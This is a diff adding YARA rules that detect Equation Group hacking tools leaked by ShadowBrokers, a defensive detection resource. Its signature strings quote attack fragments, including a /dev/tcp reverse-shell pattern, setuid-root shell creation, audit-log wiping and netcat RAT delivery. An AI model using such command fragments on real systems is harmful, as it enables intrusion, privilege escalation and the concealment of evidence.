+      ( uint16 ( 0 ) == 0x457f and filesize < 2000KB and 1 of them )
+}
+
+rule EquationGroup_x86_linux_exactchange_RID3512 : APT DEMO FILE G0020 LINUX {
+   meta:
+      description = "Equation Group hack tool set"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-09 15:57:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
+      hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
+      tags = "APT, DEMO, FILE, G0020, LINUX"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "kernel has 4G/4G split, not exploitable" fullword ascii
+      $x2 = "[+] kernel stack size is %d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 1000KB and 1 of them )
+}
+
+rule EquationGroup_emptycriss_RID3116 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:07:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "./emptycriss <target IP>" fullword ascii
+      $s2 = "Cut and paste the following to the telnet prompt:" fullword ascii
+      $s8 = "environ define TTYPROMPT abcdef" fullword ascii
+   condition: 
+      ( filesize < 50KB and 1 of them )
+}
+
+rule EquationGroup_scripme_RID2FB6 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file scripme"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:08:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" fullword ascii
+      $x2 = "Cannot read $opetc/scripme.override -- are you root?" ascii
+      $x3 = "$ENV{EXPLOIT_SCRIPME}" ascii
+      $x4 = "$opetc/scripme.override" ascii
+   condition: 
+      ( filesize < 30KB and 1 of them )
+}
+
+rule EquationGroup_dumppoppy_RID30B1 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:50:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" fullword ascii
+      $x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" fullword ascii
+      $l1 = "End of $destfile determined by \"^Connection closed by foreign host" 
+   condition: 
+      ( filesize < 20KB and 1 of them )
+}
+
+rule EquationGroup_Auditcleaner_RID3194 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:28:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "> /var/log/audit/audit.log; rm -f ." ascii
+      $x2 = "Pastables to run on target:" ascii
+      $x3 = "cp /var/log/audit/audit.log .tmp" ascii
+      $l1 = "Here is the first good cron session from" fullword ascii
+      $l2 = "No need to clean LOGIN lines." fullword ascii
+   condition: 
+      ( filesize < 300KB and 1 of them )
+}
+
+rule EquationGroup_reverse_shell_RID3236 : APT DEMO G0020 SCRIPT {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:55:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
+      tags = "APT, DEMO, G0020, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "sh >/dev/tcp/" ascii
+      $s2 = " <&1 2>&1" fullword ascii
+   condition: 
+      ( filesize < 1KB and all of them )
+}
+
+rule EquationGroup_tnmunger_RID3033 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:29:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "TEST: mungedport=%6d  pp=%d  unmunged=%6d" fullword ascii
+      $s2 = "mungedport=%6d  pp=%d  unmunged=%6d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 10KB and 1 of them )
+}
+
+rule EquationGroup_ys_ratload_RID30F5 : APT DEMO FILE G0020 SCRIPT {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:02:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75"
+      tags = "APT, DEMO, FILE, G0020, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" fullword ascii
+      $x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
+      $x3 = "CALLBACK_PORT=32177" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 3KB and 1 of them )
+}
+
+rule EquationGroup_eh_1_1_0_RID2F3F : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:49:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "usage: %s -e -v -i target IP [-c Cert File] [-k Key File]" fullword ascii
+      $x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii
+      $x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 100KB and 1 of them )
+}
+
+rule EquationGroup_evolvingstrategy_1_0_1_RID354F : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 16:07:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "chown root sh; chmod 4777 sh;" fullword ascii
+      $s2 = "cp /bin/sh .;chown root sh;" fullword ascii
+      $l1 = "echo clean up when elevated:" fullword ascii
+      $x1 = "EXE=$DIR/sbin/ey_vrupdate" fullword ascii
+   condition: 
+      ( filesize < 4KB and 1 of them )
+}
+
+rule EquationGroup_sshobo_RID2F51 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:52:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Requested forwarding of port %d but user is not root." fullword ascii
+      $x2 = "internal error: we do not read, but chan_read_failed for istate" fullword ascii
+      $x3 = "~#  - list forwarded connections" fullword ascii
+      $x4 = "packet_inject_ignore: block" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 600KB and all of them )
+}
+
+rule EquationGroup_magicjack_v1_1_0_0_client_1_1_0_0_RID382D : APT DEMO FILE G0020 SCRIPT {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 18:10:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
+      tags = "APT, DEMO, FILE, G0020, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" fullword ascii
+      $x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 80KB and 1 of them )
+}
+
+rule EquationGroup_packrat_RID2FA9 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file packrat"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:06:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x2 = "Use this on target to get your RAT:" fullword ascii
+      $x3 = "$ratremotename && " fullword ascii
+      $x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" fullword ascii
+   condition: 
+      ( filesize < 70KB and 1 of them )
+}
+
+rule EquationGroup_telex_RID2EE5 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file telex"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:34:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>" fullword ascii
+      $x2 = "target is not vulnerable. exiting" fullword ascii
+      $s3 = "Sending final buffer: evil_blocks and shellcode..." fullword ascii
+      $s4 = "Timeout waiting for daemon to die.  Exploit probably failed." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 50KB and 1 of them )
+}
+
+rule EquationGroup_calserver_RID308A : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file calserver"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:44:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "usage: %s <host> <port> e <contents of a local file to be executed on target>" fullword ascii
+      $x2 = "Writing your %s to target." fullword ascii
+      $x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 30KB and 1 of them )
+}
+
+rule EquationGroup_porkclient_RID30FE : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:03:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "-c COMMAND: shell command string" fullword ascii
+      $s2 = "Cannot combine shell command mode with args to do socket reuse" fullword ascii
+      $s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 30KB and 1 of them )
+}
+
+rule EquationGroup_electricslide_RID321F : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:51:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" fullword ascii
+      $x2 = "Recieved Unknown Command Payload: 0x%x" fullword ascii
+      $x3 = "Usage: eslide   [options] <-t profile> <-l listenerip> <targetip>" fullword ascii
+      $x4 = "-------- Delete Key - Remove a *closed* tab" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 2000KB and 1 of them )
+}
+
+rule EquationGroup_libXmexploit2_RID31F6 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:44:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage: ./exp command display_to_return_to" fullword ascii
+      $s2 = "sizeof shellcode = %d" fullword ascii
+      $s3 = "Execve failed!" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 40KB and 1 of them )
+}
+
+rule EquationGroup_wrap_telnet_RID3168 : APT DEMO FILE G0020 SCRIPT {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:21:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4"
+      tags = "APT, DEMO, FILE, G0020, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" fullword ascii
+      $s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
+      $s3 = "echo \"Call back port2 = ${SPORT}\"" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 4KB and 1 of them )
+}
+
+rule EquationGroup_elgingamble_RID313A : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:13:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" fullword ascii
+      $x2 = "[-] kernel not vulnerable" fullword ascii
+      $x3 = "[-] failed to spawn shell: %s" fullword ascii
+      $x4 = "-s shell           Use shell instead of %s" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule EquationGroup_cmsd_RID2E6A : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file cmsd"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:13:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" fullword ascii
+      $x2 = "error: not vulnerable" fullword ascii
+      $s1 = "port=%d connected! " fullword ascii
+      $s2 = "xxx.XXXXXX" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 30KB and 1 of ( $x* ) ) or ( 2 of them )
+}
+
+rule EquationGroup_ebbshave_RID3003 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:21:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" fullword ascii
+      $s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" fullword ascii
+      $s3 = "version 1 - Start with option #18 first, if it fails then try this option" fullword ascii
+      $s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 20KB and 1 of them ) or ( 2 of them )
+}
+
+rule EquationGroup_eggbasket_RID3070 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:39:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "# Building Shellcode into exploit." fullword ascii
+      $x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\"  -d 10.0.0.1 -p 80" fullword ascii
+      $x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
+}
+
+rule EquationGroup_jparsescan_RID30ED : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:00:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Usage:  $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
+      $s2 = "$gotsunos = ($line =~ /program version netid     address             service         owner/ );" fullword ascii
+   condition: 
+      ( filesize < 40KB and 1 of them )
+}
+
+rule EquationGroup_sambal_RID2F33 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file sambal"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:47:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "+ Bruteforce mode." fullword ascii
+      $s3 = "+ Host is not running samba!" fullword ascii
+      $s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" fullword ascii
+      $s5 = "+ Exploit failed, try -b to bruteforce." fullword ascii
+      $s7 = "Usage: %s [-bBcCdfprsStv] [host]" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
+}
+
+rule EquationGroup_pclean_v2_1_1_2_RID31EE : APT DEMO FILE G0020 LINUX {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 13:43:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
+      tags = "APT, DEMO, FILE, G0020, LINUX"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" fullword ascii
+      $s6 = "-c cmd_name:     strncmp() search for 1st %d chars of commands that " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 40KB and all of them )
+}
+
+rule EquationGroup_envisioncollision_RID33FA : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 15:10:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" fullword ascii
+      $x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" fullword ascii
+      $s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" fullword ascii
+      $s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 20KB and 1 of ( $x* ) ) or ( 2 of them )
+}
+
+rule EquationGroup_cmsex_RID2EE3 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:33:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) " fullword ascii
+      $x2 = "-i target ip address / hostname " fullword ascii
+      $x3 = "Note: Choosing the correct target type is a bit of guesswork." fullword ascii
+      $x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii
+      $x5 = "If one choice fails, you may want to try another." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 50KB and 1 of ( $x* ) ) or ( 2 of them )
+}
+
+rule EquationGroup_exze_RID2E7F : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file exze"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 11:17:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "shellFile" fullword ascii
+      $s2 = "completed.1" fullword ascii
+      $s3 = "zeke_remove" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 80KB and all of them )
+}
+
+rule EquationGroup_DUL_RID2DA8 : APT DEMO FILE G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file DUL"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 10:41:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e"
+      tags = "APT, DEMO, FILE, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "?Usage: %s <shellcode> <output_file>" fullword ascii
+      $x2 = "Here is the decoder+(encoded-decoder)+payload" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 80KB and 1 of them ) or ( all of them )
+}
+
+rule EquationGroup_ebbisland_RID3067 : APT DEMO G0020 {
+   meta:
+      description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland"
+      author = "Florian Roth"
+      reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+      date = "2017-04-08 12:38:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977"
+      tags = "APT, DEMO, G0020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Usage: %s [-V] -t <target_ip> -p port" fullword ascii
+      $x2 = "error - shellcode not as expected - unable to fix up" fullword ascii
+      $x3 = "WARNING - core wipe mode - this will leave a core file on target" fullword ascii
+      $x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" fullword ascii
+      $x5 = "-A <jumpAddr> (shellcode address)" fullword ascii
+      $x6 = "*** Insane undocumented incremental port mode!!! ***" fullword ascii
+   condition: 
+      filesize < 250KB and 1 of them
+}
+
